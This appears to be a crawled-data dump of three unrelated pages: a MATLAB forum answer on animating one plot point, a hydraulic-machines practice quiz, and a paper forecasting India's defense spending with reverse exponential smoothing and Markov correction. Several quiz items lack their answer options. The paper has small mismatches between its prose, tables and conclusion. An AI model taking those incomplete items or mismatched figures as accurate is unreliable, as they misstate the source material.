[ "# clear one plot in multiple (hold) figure\n\n5 views (last 30 days)\nislam dib on 14 Dec 2020\nAnswered: Ameer Hamza on 14 Dec 2020\nHello,\nI want to follow a point by plotting him every time. I want just plot the point not all previous points.\nI've tried to use this code, but it gives all points.\nx = 1:0.01:25;\ny = sin(x);\nn = numel(x);\n%figure;\nfor i = 1:n\nh=plot(x(1:i),y(1:i),'+r');\nxlim([0 25]);\nylim([-1.1 1.1]);\n%refreshdata(figure,'base')\npause(0.001);\n% drawnow;\ndelete(h)\nend\nHow can I fix the problem ?\n\nKALYAN ACHARJYA on 14 Dec 2020\nEdited: KALYAN ACHARJYA on 14 Dec 2020\nx = 1:0.01:25;\ny = sin(x);\nn = numel(x);\n%figure;\nfor i = 1:n\nh=plot(x(i),y(i),'+r');\nxlim([0 25]);\nylim([-1.1 1.1]);\npause(0.001);\ndelete(h)\nend\n\nAmeer Hamza on 14 Dec 2020\nAnother computationally efficient approach is to create a single line object and update its XData and YData properties\nx = 1:0.01:25;\ny = sin(x);\nn = numel(x);\n%figure;\nh = plot(nan, '+r');\nxlim([0 25]);\nylim([-1.1 1.1]);\nhold on\nfor i = 1:n\nh.XData = x(i);\nh.YData = y(i);\n%refreshdata(figure,'base')\npause(0.001);\nend" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83538985,"math_prob":0.996787,"size":334,"snap":"2021-31-2021-39","text_gpt3_token_len":117,"char_repetition_ratio":0.11515152,"word_repetition_ratio":0.0,"special_character_ratio":0.4071856,"punctuation_ratio":0.23529412,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99849063,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-22T23:37:43Z\",\"WARC-Record-ID\":\"<urn:uuid:dd49a8fd-a57f-4bc9-896d-d2ebcaf0cd42>\",\"Content-Length\":\"119325\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:26d8b9b9-163b-4bea-8900-b07df75865cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:08c65b0e-b1ce-4217-9183-e1fbee27d33a>\",\"WARC-IP-Address\":\"23.56.12.57\",\"WARC-Target-URI\":\"https://ch.mathworks.com/matlabcentral/answers/693465-clear-one-plot-in-multiple-hold-figure?s_tid=prof_contriblnk\",\"WARC-Payload-Digest\":\"sha1:3XTGCIXSGGCHLVRI2WIULKHEGBV7VRLT\",\"WARC-Block-Digest\":\"sha1:R3K6CKJYXI2TZW6B3ZDGG7UYLIDRHQNV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057403.84_warc_CC-MAIN-20210922223752-20210923013752-00435.warc.gz\"}"}
https://www.objectivebooks.com/2015/04/hydraulic-machines-fluid-machineries_70.html
[ "Hydraulic Machines-Fluid Machineries - Set 06 - ObjectiveBooks\n\n# Practice Test: Question Set - 06\n\n1. The centrifugal pump preferred for a specific speed between 80 to 160 r.p.m. is\n(A) Slow speed with radial flow at outlet\n(B) Medium speed with radial flow at outlet\n(C) High speed with radial flow at outlet\n(D) High speed with mixed flow at outlet\n\n2. Reaction turbines are used for\n(C) High head and low discharge\n(D) Low head and high discharge\n\n3. Which of the following hydraulic unit is used for transmitting increased or decreased torque to the driven shaft?\n(A) Hydraulic ram\n(B) Hydraulic intensifier\n(C) Hydraulic torque converter\n(D) Hydraulic accumulator\n\n4. A centrifugal pump will start delivering liquid only when the pressure rise in the impeller is equal to the\n\n5. If a pump is handling water and is discharging a certain flow Q at a constant total dynamic head requiring a definite B.H.P., the same pump when handling a liquid of specific gravity 0.75 and viscosity nearly same as of water would discharge\n(A) Same quantity of liquid\n(B) 0.75 Q\n(C) Q/0.75\n(D) 1.5 Q\n\n6. The overall efficiency of a reaction turbine is the ratio of\n(A) Power produced by the turbine to the energy actually supplied by the turbine\n(B) Actual work available at the turbine to the energy imparted to the wheel\n(C) Work-done on the wheel to the energy (or head of water) actually supplied to the turbine\n(D) None of the above\n\n7. The force exerted by a jet of water (in a direction normal to flow) impinging on a fixed plate inclined at an angle θ with the jet is\n(A) (waV/2g) × sin θ\n(B) (waV/g) × sin θ\n(C) (waV²/2g) × sin 2θ\n(D) (waV²/g) × sin θ\n\n8. Casting of a centrifugal pump is designed so as to minimize\n(A) Friction loss\n(B) Cavitations\n(D) Loss of kinetic energy\n\n9. A hydraulic ram is a device used to\n(A) Store the energy of water\n(B) Increase the pressure of water\n(C) To lift water from deep wells\n(D) To lift small quantity of water to a greater height when a large quantity of water is available at a smaller height\n\n10. According to fan laws, at constant speed and capacity, the pressure and power vary\n(A) Directly as the air or gas density\n(B) Inversely as square root of density\n(C) Inversely as density\n(D) As square of density\n\n11. The ratio of quantity of liquid discharged per second from the pump to the quantity of liquid passing per second through the impeller is known as\n(A) Manometric efficiency\n(B) Mechanical efficiency\n(C) Overall efficiency\n(D) Volumetric efficiency\n\n12. Discharge (Q) of a centrifugal pump is given by (where D = Diameter of impeller at inlet, b = Width of impeller at inlet, and Vf = Velocity of flow at inlet)\n(A) Q = π.D.Vf\n(B) Q = π.b.Vf\n(C) Q = π.D.bf.V\n(D) Q = D.b.Vf\n\n13. Multistage centrifugal pumps are used to obtain\n(A) High discharge\n(C) Pumping of viscous fluids\n(D) High head and high discharge\n\n14. Which of the following turbine is preferred for 0 to 25 m head of water?\n(A) Pelton wheel\n(B) Kaplan turbine\n(C) Francis turbine\n(D) None of these\n\n15. Dynamic similarity is said to exist between the model and the prototype, if both of them\n(A) Have identical velocities\n(B) Are equal in size and shape\n(C) Are identical in shape, but differ only in size\n(D) None of the above\n\nShow and hide multiple DIV using JavaScript View All Answers\n\nBlogger Comment" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85964495,"math_prob":0.9837286,"size":3443,"snap":"2022-27-2022-33","text_gpt3_token_len":1055,"char_repetition_ratio":0.1357953,"word_repetition_ratio":0.034379672,"special_character_ratio":0.28463548,"punctuation_ratio":0.065868266,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9743286,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T11:22:16Z\",\"WARC-Record-ID\":\"<urn:uuid:e0cbf6fe-ad77-4055-8d13-fe59e4189165>\",\"Content-Length\":\"208586\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a2529f7f-d367-4535-b4c4-5c35029bab13>\",\"WARC-Concurrent-To\":\"<urn:uuid:5396a2a2-e838-43e0-a519-e81e6e03dcce>\",\"WARC-IP-Address\":\"172.253.62.121\",\"WARC-Target-URI\":\"https://www.objectivebooks.com/2015/04/hydraulic-machines-fluid-machineries_70.html\",\"WARC-Payload-Digest\":\"sha1:NA6EGLQB4CFGDAROWB4TYHSYREYVU737\",\"WARC-Block-Digest\":\"sha1:DNMEC6ENHRBZUXRVJAL52H7VHTJOF5H6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103671290.43_warc_CC-MAIN-20220630092604-20220630122604-00709.warc.gz\"}"}
https://www.hindawi.com/journals/mpe/2020/6210616/
[ "Research Article | Open Access\n\nVolume 2020 |Article ID 6210616 | https://doi.org/10.1155/2020/6210616\n\nTong Niu, Lin Zhang, Bo Zhang, Bofan Yang, Shengjun Wei, \"An Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain\", Mathematical Problems in Engineering, vol. 2020, Article ID 6210616, 11 pages, 2020. https://doi.org/10.1155/2020/6210616\n\n# An Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain\n\nRevised07 Aug 2020\nAccepted16 Sep 2020\nPublished28 Sep 2020\n\n#### Abstract\n\nOn the basis of the triple exponential smoothing prediction model, this paper introduces the reverse prediction idea and establishes the reverse triple exponential smoothing model by setting parameters such as threshold value and iteration times and reasonably correcting its initial value. This method can effectively reduce the error of early prediction value. At the same time, aiming at the problem that the predicting advantage of the reverse triple exponential smoothing model weakens in the later period, Markov theory is introduced to correct its error value, and an improved prediction model combining inverse exponential smoothing and Markov chain is further established. The improved model combines the advantages of index model trend prediction and Markov fluctuation prediction, and the prediction accuracy and stability of the model are significantly improved through case tests.\n\n#### 1. Introduction\n\nNational defense expenditure is an important component of national financial expenditure. It is the source of funds and important support for national defense and military construction. It reflects the economic level of a country’s investment in national defense construction and embodies national defense policy and national defense strategy . Predicting a country’s national defense expenditure is not only helpful to analyze the trend of the country’s national defense and military construction but also helpful to analyze the relationship between its national defense expenditure and economic growth. Therefore, it is of far-reaching practical significance to make a reasonable prediction of national defense expenditure. In this paper, a new model is established on the basis of exponential smoothing model to effectively predict defense expenditure.\n\nExponential smoothing method is a time series analysis and prediction method. This method predicts the future trend according to the current situation and data by calculating the smoothing value of the index and combining with a reasonable time series prediction model . The exponential smoothing method can be divided into single exponential smoothing method, double exponential smoothing method, and triple exponential smoothing method according to exponential times. Among them, the triple exponential smoothing method is often used to fit and predict nonlinear time series and has achieved good prediction effect especially in short-term and medium-term prediction of nonlinear time series, with small error fluctuation range and strong credibility. At present, it has been widely used in the fields of public transportation passenger volume prediction [5, 6], economic output value prediction [7, 8], spare parts prediction [9, 10], wind speed prediction of wind farms [11, 12], building displacement prediction [13, 14], GPS PWV prediction , Docker container resource load prediction , etc. Qi and Huo proposed a single exponential smoothing model based on self-adaptation. By introducing the approximate dynamic programming method and combining with the actual traffic flow data, the exponential smoothing coefficient was optimized to make it update automatically with the prediction process, thus ensuring the real-time accuracy of the prediction . Wang et al. proposed an adaptive dynamic cubic exponential smoothing prediction method. In this method, the carpet search method is used, the best smoothing coefficient is obtained according to the principle of minimum sum of squares error, and the prediction effect of the model is verified by an example of wind speed data . Mi et al. proposed a short-term power load forecasting method based on improved exponential smoothing gray model. This method combined the exponential smoothing model and gray model and used the 0.618 method to search for the best smoothing coefficient, which achieved good prediction effect . Liu et al. proposed a new short-medium satellite clock error prediction algorithm based on the modified exponential smoothing method, improved the weighted parameters in ES, and proposed the dynamic weighted parameters based on the sliding window. The gray scale model (GM) is introduced to learn the prediction error of DES, which improves the prediction accuracy of the algorithm .\n\nIn this paper, the triple exponential smoothing predicting model is applied to the field of defense expenditure prediction. On the basis of the triple exponential smoothing model, the error trend and fluctuation of the initial data are fully considered, the reverse predicting idea and Markov state transition matrix are introduced to correct its data fluctuation, and a reverse triple exponential smoothing model based on Markov correction is established. After example verification, the new model has higher prediction accuracy in the field of national defense expenditure than the traditional triple exponential smoothing model.\n\n#### 2. Triple Exponential Smoothing Model\n\nExponential smoothing model is a weighted average model that uses dynamic weight coefficients to weigh the original data. And the biggest characteristic of this method is that it focuses on the influence of recent data on the prediction model . In other words, the more recent the data, the greater the weight coefficient and the smaller the weight coefficient of the earlier data. The triple exponential smoothing method is to add another exponential smoothing on the basis of the first exponential smoothing and the second quadratic exponential smoothing. By estimating the parameters of the quadratic curve model, the nonlinear time series can be adjusted to eliminate irregular disturbances and random errors. It is suitable for numerical prediction of quadratic curve trend of original data.\n\n##### 2.1. Traditional Triple Exponential Smoothing Model\n\nLet the time series bewhere is the time series data at time , is the first group of time series data, is the second group of time series data, is the third group of time series data, and is the th group of time series data.\n\nSingle exponential smoothing series:\n\nDouble exponential smoothing series:\n\nTriple exponential smoothing series:\n\nAmong them, , , and are exponential smoothing values (); , , and are exponential smoothing initial values, which generally take the first original value or the average of the previous original values. According to the initial value of exponential smoothing and the original time series, the exponential smoothing value at the following time is determined. The recurrence formulas are as follows:\n\nAmong them, is called smoothing coefficient (0 <  < 1). Existing literatures usually use MSE, MAE, AARE minimum principle, or artificial subjective test to determine the reasonable value of . The larger , the higher the emphasis on new data in the prediction, the greater the role of new data, the higher the sensitivity of prediction results, and the better the ability to adapt to new levels. The smaller , the higher the emphasis on old data in the prediction, the more conservative the prediction results, and the slower the response to the changes of the actual data, and lag is easy to occur [22, 23]. In this paper, the AARE minimum principle is used to determine the value of . Parameters , , and are usually calculated by using exponential smoothing values. The parameter estimation formulas are as follows:\n\nThe quadratic parabola model is established by using parameters , , and . is used to represent the number of predictive lead periods to predict the future value at :\n\nGenerally speaking, when the number of time series of original data is large (i.e., for data with >25 items), the triple exponential smoothing method takes . When the original data is 25 items or less, the average value of previous periods of data is often taken as the initial value of exponential smoothing. However, in general, the selection of initial values has great subjectivity, which will cause certain error influence on the prediction trend of the later model . Although this error often has little influence in the medium- and long-term prediction composed of a large amount of data, it cannot be ignored in the short-term prediction. Therefore, this paper introduced the reverse prediction. Due to the unreasonable selection of initial values, the error of future predicted values may be large. Therefore, a reverse cubic exponential smoothing model is established to solve this problem.\n\n##### 2.2. Reverse Triple Exponential Smoothing Model\n\nThe inverse triple exponential smoothing model is based on the triple exponential smoothing model and uses the idea of reverse prediction to correct the initial value of exponential smoothing. Firstly, the traditional triple exponential smoothing model is used to predict and obtain to predicted values ( is selected according to needs; usually , and this paper only takes the value as an example). And at this time, the initial value selected by the model is the first value of the original data. Then, the obtained predicted values and actual values are used for reverse prediction to obtain the first 3 reverse predicted values of the original data. According to the quadratic parabola trend of triple exponential smoothing model, if this set of data fitting effect is good, the initial value obtained by reverse prediction is closely related to the first three items of actual data. And it has similar numerical values. The modified initial value can be obtained by weighting the predicted initial value and the initial value of the original data. The specific steps are as follows.\n\nDefinition 1. Let be that original sequence of single reverse prediction:(i)Step 1. The traditional triple exponential smoothing model is used to fit the original data containing items, and the prediction can be obtained:(ii)Step 2. Establish a reverse prediction:(iii)Step 3. Establish a triple exponential smoothing model for the newly established reverse single prediction original sequence to obtain(iv)Step 4. The first three initial values are weighted and combined to obtain an initial value after single reverse prediction correction:where is the adjustment factor (usually 0.5).(v)Step 5. Set the threshold index.According to the actual demand, the corresponding threshold value is set, and the fitting accuracy of the new model is judged by using different accuracy test indexes. If it meets the requirements, the model can be used for prediction. If it does not meet the requirements, the next reverse prediction is carried out until the initial value meets the accuracy requirements after iterations, and then the corresponding prediction is carried out by using the model.(vi)Step 6. Output the predicted value.The improved triple exponential smoothing model is established by using the modified initial values , and the predicted values can be obtained:\n\n#### 3. Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain\n\nThe Markov model is a random time series analysis method, which predicts the future state of things by studying different states and state transition probability matrices of things. It has high scientific accuracy and adaptability [14, 2527]. This method requires less historical data and only needs the recent data and information of the predicted object to make prediction. It has better error correction effect for data with large random fluctuation. Markov theory is a branch of stochastic process, which is a method to predict future system development according to the transition probability between states. The Markov prediction model is a random and variable mathematical process; the core of modeling is to master the law of system state transition. The basic idea of the Markov probabilistic prediction model is to analyze the current situation of the system and use Markov chain to solve the probability of a particular state to which the system may change in the future.\n\nAssuming time series and the observable data in time series are discrete, we divide the range of error values into intervals. So, this time series has states . Suppose that the probability of the sequence in state is . When the probability of sequence to be transferred from the first state to another state is , then ; when the time series value at time is only related to the transition probability and time series value at time , then this time series becomes a time series with Markov property.\n\nBased on the inverse triple exponential smoothing model, Markov’s state transition probability matrix is used to predict the error fluctuation, thus correcting the error and further improving the prediction accuracy of the model. The specific steps are as follows:(i)Step 1. According to the nature of the state transition and full probability formula, deduce the equation of Markov chain.where is the probability of the sequence in state and is the probability of sequence to be transferred from the first state to another state .(ii)Step 2. State interval division.According to the prediction results of the inverse triple exponential smoothing model, the error between it and the actual value is calculated, the corresponding interval threshold is set, and the error is divided into several intervals. The error selection here usually adopts relative error or actual residual error .(iii)Step 3. Calculate the initial probability.Assuming that the definition domain of time series is , we divide this definition domain into states according to certain requirements. For this time series , all we know is the transition state observed previously, and the transition state of the last term is unknown. Calculating the initial probability requires the number of state data in the state of the previous data. Suppose that data are in the state; the occurrence frequency of state is(iv)Step 4. Construct Markov state transition matrix and calculate the transition probability.In this paper, the transition probability of error from one state to another is defined as the state transition probability matrix. For example, the number of transitions from state to state is , and the total number of transitions from state is ; then, the probability of transitions from state to state is , and a state transition probability matrix is constructed [29, 30]:After predicting backward times from the current state, the transition probability matrix correspondingly becomes .(v)Step 5. Error correction.According to the actual situation of the observed data falling into the state , it is also clear that the th row element of is because the probability of transition to may be greater than other states, so the final transition state can be predicted. And according to Step 4, after the state transition probability matrix is determined, the next state that is most likely to occur can be predicted, and the error interval of the predicted state can be grasped so that the error of this state can be reasonably estimated. Let us define the error to be . In this paper, the median value of the range of state values is used to correct Markov error.(vi)Step 6. Output the corrected predicted value.\n\nThe overall flowchart of building the model is shown in Figure 1. First is the selection stage of the research object. The trend analysis, seasonal analysis, periodic analysis, and other methods are adopted to identify the time series and determine the applicable model. In this paper, the exponential smoothing model is selected according to the data instance. Secondly, the traditional exponential smoothing model is studied. Different principles are adopted to determine the relevant parameters, which are substituted into the recursive formula to calculate the coefficient of the exponential smoothing model. The third is the improvement stage of exponential smoothing model. The inverse prediction method is used to determine the number of iterations and other parameters, and the initial value is corrected so as to output the inverse triple exponential smoothing initial value correction model. In the fourth part, an improved inverse exponential smoothing and Markov combination prediction model is established. On the basis of inverse triple exponential smoothing model, Markov theory is introduced to correct the fluctuation error by dividing the state interval and establishing the probability transition matrix. Finally, in the stage of verification and analysis, the accuracy of the traditional exponential smoothing model, inverse triple exponential smoothing model, and improved prediction model combining inverse exponential smoothing and Markov chain was tested, respectively, and the prediction effects were analyzed to output the optimal prediction model.\n\n#### 4. Instance Validation\n\n##### 4.1. Data Selection\n\nThis paper selects India’s defense expenditure data from 1990 to 2017 (Table 1) to verify the prediction accuracy of the model. The self-fitting of MATLAB data shows that this group of data shows an obvious quadratic parabola trend (Figure 2), and its growth trend is obvious and relatively stable, which meets the data requirements of the triple exponential smoothing model. Among them, India’s defense expenditure data from 1990 to 2012 are taken as the original time series, and India's defense expenditure data from 2013 to 2017 are taken as the predicted test data.\n\n Year Defense expenditure (hundred million rupees) 1990 1875.57 1991 1989.42 1992 2130.22 1993 2645.63 1994 2833.00 1995 3273.12 1996 3588.35 1997 4354.92 1998 5106.19 1999 6274.99 2000 6469.72 2001 7029.45 2002 7216.66 2003 7739.66 2004 9648.66 2005 10350.30 2006 11019.10 2007 11904.20 2008 15175.60 2009 19932.90 2010 21456.00 2011 23733.80 2012 25730.60 2013 28459.70 2014 31943.60 2015 33228.20 2016 39667.30 2017 42350.60\nNote. All data are from the official website of the Stockholm international peace research institute: https://sipri.org/databases/milex. And all data are denominated in rupee, India’s official currency.\n##### 4.2. Data Inspection Method\n\nAt present, the commonly used data inspection methods mainly include the following ( represents the actual value of the th time series data, and represents the predicted value of the th time series data).(1)Mean absolute error (MAE):The smaller the MAE, the higher the prediction accuracy.(2)Average absolute relative error (AARE):The accuracy division range of AARE is shown in Table 2.\n\n AARE value range Below 10% 10%–20% 20%–50% More than 50% Prediction model accuracy High accuracy Good accuracy Feasible Not feasible\nAARE is usually expressed as a percentage. The smaller the value, the higher the prediction accuracy.(3)Inequality coefficient (IC):\n\nThe value of IC is between 0 and 1. The closer to 1, the worse the prediction accuracy, and the closer to 0, the higher the prediction accuracy.\n\n##### 4.3. Prediction Results and Analysis of Results\n\nThe data of India’s defense expenditure from 1990 to 2012 are substituted into the traditional triple exponential smoothing prediction model, and the initial value is set as the average of the first three data: . The value is determined by AARE minimum principle. The traditional triple exponential smoothing model is used to output the corresponding fitting value from 1990 to 2012 and the predicted value from 2013 to 2017. Then, the first three initial values are reversed by using the 2013–2015 predicted value to establish a reverse triple exponential smoothing model, and the corresponding fitting value and the 2013–2017 predicted value are output. The fitting values of the two models are shown in Table 3 and Figure 3, and the predicted values are shown in Table 4(model I refers to the triple exponential smoothing model and model II refers to the reverse triple exponential smoothing model).\n\n Year Actual value Model I Absolute error Relative error (%) Model II Absolute error Relative error (%) 1990 1875.57 — — — — — — 1991 1989.42 1851.00 138.42 6.96 1444.22 545.20 27.40 1992 2130.22 1958.14 172.08 8.08 1704.37 425.85 19.99 1993 2645.63 2164.25 481.38 18.20 2112.12 533.51 20.17 1994 2833.00 2825.12 7.88 0.28 2774.19 58.81 2.08 1995 3273.12 3160.86 112.26 3.43 3238.32 34.80 1.06 1996 3588.35 3668.46 80.11 2.23 3799.97 211.62 5.90 1997 4354.92 4042.42 312.50 7.18 4115.12 239.80 5.51 1998 5106.19 4899.57 206.62 4.05 4979.33 126.86 2.48 1999 6274.99 5825.04 449.95 7.17 5885.66 389.33 6.20 2000 6469.72 7207.07 737.35 11.40 7094.16 624.44 9.65 2001 7029.45 7458.92 429.47 6.11 7382.91 353.46 5.03 2002 7216.66 7833.70 617.04 8.55 7724.44 507.78 7.04 2003 7739.66 7837.46 97.80 1.26 7685.59 54.07 0.70 2004 9648.66 8200.85 1447.81 15.01 8307.23 1341.43 13.90 2005 10350.30 10365.27 14.97 0.14 10533.85 183.55 1.77 2006 11019.10 11456.27 437.17 3.97 11537.29 518.19 4.70 2007 11904.20 12113.08 208.88 1.75 12087.04 182.84 1.54 2008 15175.60 12912.67 2262.93 14.91 13167.58 2008.02 13.23 2009 19932.90 16628.87 3304.03 16.58 16945.34 2987.56 14.99 2010 21456.00 22717.92 1261.92 5.88 23371.58 1915.58 8.93 2011 23733.80 25095.92 1362.12 5.74 25232.82 1499.02 6.32 2012 25730.60 27141.58 1410.98 5.48 27004.24 1273.64 4.95\n Year Actual value Model I Absolute error Relative error (%) Model II Absolute error Relative error (%) 2013 28459.70 28787.64 327.94 1.15 28506.25 46.55 0.16 2014 31943.60 32033.60 90.00 0.28 32030.02 86.42 0.27 2015 33228.20 35239.83 2011.63 6.05 34696.09 1467.89 4.42 2016 39667.30 36704.50 2962.80 7.47 36703.42 2963.88 7.47 2017 42350.60 41150.43 1200.17 2.83 41146.20 1204.40 2.84\n\nFrom Table 5, it can be seen that the MAE and AARE indexes of model II are lower and the IC indexes are higher than those of model I. According to the fitting data of the two models from 1991 to 2012, it can be found that the errors of the first three data are too large, which seriously affects the evaluation of indexes. This is because the reverse prediction model carries out reverse prediction correction for the first three initial values, while for the original data less than or equal to three items, it does not meet the reverse prediction conditions, resulting in excessive error of the first three fitting values. Therefore, the first three fitting data are removed to make a precision comparison (see Table 6).\n\n MAE AARE IC Model I 706.98 7.02 0.0453 Model II 727.97 8.34 0.0441\n MAE AARE IC Model I 776.94 6.37 0.0451 Model II 763.73 6.10 0.0435\n\nAs can be seen from Table 6, after removing the first three fitting values, the three indexes of model II are better than those of model I. It should be emphasized that the cubic exponential smoothing model in this paper is established based on dynamic data. Therefore, when predicting the leading period number T = 1, 2, 3, 4, and 5, respectively, the model comprehensively considers the error results of the fitting value and the predicted value and calculates the optimal smoothing coefficient so as to generate the corresponding parameter values , , and , respectively (predicting the benchmark year is 2012), as shown in Table 7.\n\n T Model I Model II 1 0.40 26035.37 2684.58 67.69 0.45 25942.50 2521.59 42.16 2 0.35 26114.59 2795.02 82.24 0.35 26113.87 2793.91 82.08 3 0.35 26114.59 2795.02 82.24 0.40 26035.14 2684.14 67.61 4 0.45 25942.56 2521.73 42.19 0.45 25942.50 2521.59 42.16 5 0.40 26035.37 2684.58 67.69 0.40 26035.14 2684.14 67.61\n\nAccording to models I and II, India’s defense spending from 2013 to 2017 is predicted, respectively, and compared with actual data (Table 4), and the prediction precision of model I and model II is compared (Table 8).\n\n MAE AARE IC Model I 1318.51 3.56 0.0240 Model II 1153.83 3.03 0.0224\n\nIt can be seen from Tables 4 and 8 that the prediction effect of model II was better than that of model I from 2012 to 2017, with the mean absolute error (MAE) reduced by 12.49%, the average absolute relative error (AARE) reduced by 14.89%, and the inequality coefficient (IC) reduced by 6.67%. Overall, the prediction accuracy is improved compared with the traditional exponential smoothing prediction model. However, for specific data, it can be seen that the absolute error of reverse triple exponential smoothing model II is obviously reduced on the predicted values from 2013 to 2015, but for the predicted data from 2016 to 2017, the error has basically not changed.\n\nTherefore, on the basis of model II, Markov theory is introduced to further correct the error. According to the calculation results of model II, its relative error is divided into several states, and according to Markov theory, the concentration degree of error range is divided so that each interval meets the objective law of state change . The standard of state interval division is shown in Table 9. According to the relative error of the fitting values obtained in model II, we can divide them into different states, as shown in Table 10.\n\n Status Interval E1 (−30%, −10%] E2 (−10%, 0] E3 (0, 5%] E4 (5%, 10%]\n Year Number Relative error (%) Belonging status 1991 1 −27.40 E1 1992 2 −19.99 E1 1993 3 −20.17 E1 1994 4 −2.08 E2 1995 5 −1.06 E2 1996 6 5.90 E4 1997 7 −5.51 E2 1998 8 −2.48 E2 1999 9 −6.20 E2 2000 10 9.65 E4 2001 11 5.03 E4 2002 12 7.04 E4 2003 13 −0.70 E2 2004 14 −13.90 E1 2005 15 1.77 E3 2006 16 4.70 E3 2007 17 1.54 E3 2008 18 −13.23 E1 2009 19 −14.99 E1 2010 20 8.93 E4 2011 21 6.32 E4 2012 22 4.95 E3\nNote. Positive and negative relative errors should be considered in the table.\n\nSince the state transition is random, probability must be used to describe the possibility of the state transition, that is, the state transition probability [35, 36]. According to the relevant probability calculation formula in Section 3 (Improved Prediction Model Combining Inverse Exponential Smoothing and Markov Chain), the single state transition probability matrix is constructed as follows:\n\nAs can be seen from Table 10, the data in 2012 are in state E3, and according to the state transition matrix, it can be seen that the predicted data in 2013 are most likely to be in state E3. The median value of the state value range is taken for Markov error correction, and combined with the prediction value of reverse triple exponential smoothing model, the final prediction value for 2013 is 2786.298 billion rupees.\n\nSimilarly, the n times state transition probability matrix can be obtained according to the one-time state transition probability matrix . After the transition matrix is determined, the possible states in 2013–2017 can be predicted according to the state in 2012, and then the final prediction values of an improved reverse exponential smoothing and Markov combination prediction model (set as model III) for 2013–2017 can be obtained, respectively, as shown in Table 11.\n\n Year Model III predicted value 2013 27862.98 2014 31386.76 2015 34052.83 2016 39276.48 2017 43719.26\n\nAccording to the three indexes of MAE, AARE, and IC, the prediction accuracy of the three models are compared, as shown in Table 12 and Figures 46.\n\n MAE AARE (%) IC Model I 1318.51 3.56 0.0240 Model II 1153.83 3.03 0.0224 Model III 747.53 2.11 0.0115\n\nFrom the analysis of Table 12 and Figures 46, it can be seen that the prediction accuracy of model III is significantly improved compared with models I and II, and its MAE, AARE, and IC are greatly reduced. The MAE index of model III is 43.30% lower than model I, the AARE index of model III is 40.76% lower than model I, and the IC index of model III is 52.03% lower than model I. For specific data, the prediction error of model III increased from 2013 to 2014, but its prediction error from 2015 to 2016 decreased significantly compared with that of models I and II, and the overall curve was closer to the actual value.\n\n#### 5. Conclusion\n\nIn this paper, triple exponential smoothing model I, inverse triple exponential smoothing model II, and improved prediction model III combining inverse exponential smoothing and Markov chain are established, respectively. Taking India's defense expenditure data from 1990 to 2012 as the original time series and the data from 2013 to 2017 as the unknown test values, this paper draws the following conclusions through comparative analysis:(1)The quadratic curve fitting trend of India’s defense expenditure data from 1990 to 2017 is good. Verified by models I, II, and III, the average relative error of the fitting values is below 10%, and the average relative error of the predicted values is below 4%, with high accuracy, which shows that it is more reasonable to use the triple exponential smoothing model to predict India’s defense expenditure.(2)Compared with model I, the overall prediction accuracy of model II is improved. Its MAE is relatively reduced by 12.49%, AARE is relatively reduced by 14.89%, and IC is relatively reduced by 6.67%, but its prediction advantage is weakened in the later period.(3)Model III has the highest prediction accuracy. Compared with model I, its MAE, AARE, and IC are reduced by 43.30%, 40.73%, and 52.08% respectively. Compared with model II, its MAE, AARE, and IC are reduced by 35.21%, 30.36%, and 48.66%, respectively. On the basis of making full use of time series to predict the trend, the improved prediction model combining inverse exponential smoothing and Markov chain uses Markov theory to predict the fluctuation, thus obviously reducing the error fluctuation range and making the predicted value closer to the actual value and the prediction effect more stable.\n\nThis paper only predicts the national defense expenditure from the perspective of time series, but in fact, national defense expenditure will inevitably be affected by multidimensional factors such as economic development, military construction, and national defense policies [37, 38]. In the following research, if the time series and multidimensional influencing factors can be integrated to establish a prediction model, it will more effectively support the prediction decision.\n\n#### Data Availability\n\nThe data used to support the findings of this study are available from the corresponding author upon request.\n\n#### Conflicts of Interest\n\nThe authors declare that they have no conflicts of interest.\n\n#### Acknowledgments\n\nThis study was supported in part by the China Postdoctoral Science Foundation (2017M623417) and Shaanxi Province Natural Science Basic Research Program (2019JQ-708).\n\n1. K. Zhang, B. Liu, D. Huang, and X. Ren, “Empirical study on the relationship between national defense expenditure, economic growth and resident consumption in China,” Journal of Naval Engineering University, vol. 28, no. 5, pp. 69–74, 2016. View at: Google Scholar\n2. Z. Cao, Y. Liu, and J. Dong, “Predict of railway passenger volume based on triple exponential smoothing,” Railway Transportation and Economy, vol. 40, no. 11, pp. 49–53, 2018. View at: Google Scholar\n3. G. Feng, L. Chen-Yu, Z. Bin, and Z. Su-Qin, “Spares consumption combination forecasting based on genetic algorithm and exponential smoothing method,” in Proceedings of the 2012 Fifth International Symposium on Computational Intelligence and Design, pp. 198–201, Hangzhou, China, October 2012. View at: Publisher Site | Google Scholar\n4. K. Y. Chan, T. S. Dillon, J. Singh, and E. Chang, “Neural-network-based models for short-term traffic flow forecasting using a hybrid exponential smoothing and levenberg-marquardt algorithm,” IEEE Transactions on Intelligent Transportation Systems, vol. 13, no. 2, pp. 644–654, 2012. View at: Publisher Site | Google Scholar\n5. D. Shi, S. Wang, Y. Cai, and L. Chen, “Stochastic predictive energy management of power split hybrid electric bus for real-world driving cycles,” IEEE Access, vol. 6, pp. 61700–61713, 2018. View at: Publisher Site | Google Scholar\n6. Y. Li, H. He, and J. Peng, “An adaptive online prediction method with variable prediction horizon for future driving cycle of the vehicle,” IEEE Access, vol. 6, pp. 33062–33075, 2018. View at: Publisher Site | Google Scholar\n7. H. Wang and H. Wang, “GDP predict based on exponential smoothing method and regression analysis,” Economic Research Journal, vol. 35, no. 7, pp. 1–6, 2018. View at: Google 